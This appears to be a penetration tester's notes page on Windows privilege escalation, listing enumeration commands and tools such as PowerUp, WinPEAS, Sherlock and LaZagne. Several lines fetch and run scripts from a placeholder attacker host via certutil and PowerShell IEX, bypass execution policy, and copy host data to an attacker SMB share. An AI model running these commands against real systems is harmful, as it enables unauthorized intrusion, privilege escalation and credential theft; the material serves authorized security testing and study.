πŸ’₯Cyb3rBook

WINDOWS PRIVESC

4 min read

PRIMARY CATEGORY β†’ WINDOWS PENTESTING

Components ⟑


Groups ⟑

Windows Privileged Groups


Privileges ⟑

Windows Privileges


Enabling disabled Privileges

Github Repository

EnableAllTokenPrivs.ps1

Setup
  • Download the PS Script

From the attacker βš”οΈ

curl --silent --location --request GET 'https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1' --remote-name
  • Transferring it to the target

From the attacker βš”οΈ

python3 -m http.server 80

From the target 🎯

mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPE
certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/EnableAllTokenPrivs.ps1'
  • Importing the PS Script/Module

From the Target 🎯

Import-Module .\EnableAllTokenPrivs.ps1
Usage
.\EnableAllTokenPrivs.ps1
Verifying the Current User Privileges
whoami /priv
Resources

Lee Holmes: Adjusting Token Privileges in Powershell

Medium: Enable All Token Privileges

Manual Enumeration

Network
Network Interfaces, IP Addresses and DNS
ipconfig /all
ARP Table
arp -a
Routing Table
route print
TCP Ports

CMD

netstat -ano

PS

Get-NetTCPConnection -State Listen
Protections
Windows Defender Status
Get-MPComputerStatus
AppLocker Rules
Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
  • Testing AppLocker Policy against a certain principal
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -Path '<BINARY_PATH>' -User '<USER_OR_GROUP>'
Running Processes

CMD

tasklist /svc

PS

Get-Process

Get-Process

Get-CIMInstance

Get-CIMInstance -ClassName win32_process
TCP Port ↔ PID

CMD & PS

netstat -ano
  • Process name ↔ TCP Port

PS

Get-NetTCPConnection -State Listen | % { "$( (Get-Process -Id $_.OwningProcess).name ) β†’ $( $_.LocalPort )" }
  • Process CMDLine ↔ TCP Port

PS

Get-NetTCPConnection -State Listen | % { "$( $_.LocalPort ) β†’ $( (Get-CIMInstance -ClassName win32_process -Filter "ProcessId=$( $_.OwningProcess )" -Property * ).CommandLine )" }
Monitoring for new Processes

From the attacker βš”οΈ

python3 -m http.server 80

From the target 🎯

IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Procmon.ps1')
Environment Variables

CMD

set

PS

dir env:
Detailed Information about the Host
systeminfo
Patches and Updates

CMD

QFE stands for Quick Fix Engineering

wmic qfe

PS

Get-HotFix | ft -AutoSize
Installed Software

CMD

wmic product get name

PS

Get-WMIObject -Class Win32_Product | Select Name, Version
Users, Groups and Computers
Logged-In Users
query user
Current User
whoami
echo %USERNAME%
Current User Information
whoami /all
net user %USERNAME%
Current User Privileges
whoami /priv
Current User Groups
whoami /group
List Local System Users
net user
List Local System Groups
net localgroup
Listing information about a certain group
net localgroup '<GROUP>'
Local Password Policiy
net accounts
Users’ Description

PS

Get-LocalUser
Computer Description

PS

Get-CIMInstance -ClassName win32_operatingsystem | Select -ExpandProperty Description
Checking if the current host is a domain-joined machine

CMD

echo %logonserver%
echo %userdnsdomain%
systeminfo | findstr /I 'domain'

PS

Get-CIMInstance WIN32_ComputerSystem | Select Domain
Listing information about the available DCs
cmd.exe /c nltest.exe /dsgetdc:%userdnsdomain%
cmd.exe /c nltest.exe /dclist:%userdnsdomain%
Scheduled Tasks

CMD & PS

schtasks /query /fo LIST /v

PS

Get-ScheduledTask | select TaskName,State

Automated Enumeration

PowerUp

PowerUp.ps1

Seatbelt

Seatbelt

Precompiled Binaries

WinPEAS

WinPEAS

SharpUp

SharpUp

Precompiled Binaries

Sherlock

Sherlock

Missing Software Patches

Setup
  • Downloading the Powershell Script

From the attacker βš”οΈ

curl --silent --location --request GET --remote-name 'https://github.com/rasta-mouse/Sherlock/raw/refs/heads/master/Sherlock.ps1'
  • Transferring it to the target

Fileless

From the attacker βš”οΈ

python3 -m http.server 80

From the target 🎯

IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Sherlock.ps1')
Usage

Find-AllVulns

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
Find-AllVulns
Windows Exploit Suggester

Windows Exploit Suggester

Setup

Python2.7 required

  • Setting up Python2.7
curl https://pyenv.run | bash
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init -)"
pyenv install 2.7.18
  • Creating a Virtual Environment
pyenv shell 2.7.18 && pip install virtualenv
virtualenv .venv
. !$/bin/activate
  • Downloading the Python Script

From the attacker βš”οΈ

curl --silent --location --request GET --remote-name 'https://github.com/strozfriedberg/Windows-Exploit-Suggester/raw/refs/heads/master/windows-exploit-suggester.py'
  • Gathering System Information

From the target 🎯

systeminfo > systeminfo.txt
  • Transferring the resource above to the attacker

Setting up an SMB Server

From the attacker βš”οΈ

smbserver.py -smb2support -user '<USER>' -password '<PASSWD>' '<SHARE>' '<LOCAL_PATH>'

Creating a Network Drive

From the target 🎯

net use X: '\\<ATTACKER_IP>\<SHARE>' /USER:<USER> <PASSWD>
  • Updating the Local Microsoft Vulnerability Database

From the attacker βš”οΈ

The command below generates an Excel File

python windows-exploit-suggester.py --update
  • Running the Tool
python windows-exploit-suggester.py --database '<XLS_FILE>' --systeminfo '<SYSTEMINFO_FILE>'
LaZagne

LaZagne

Credential Hunting

Graph View

Backlinks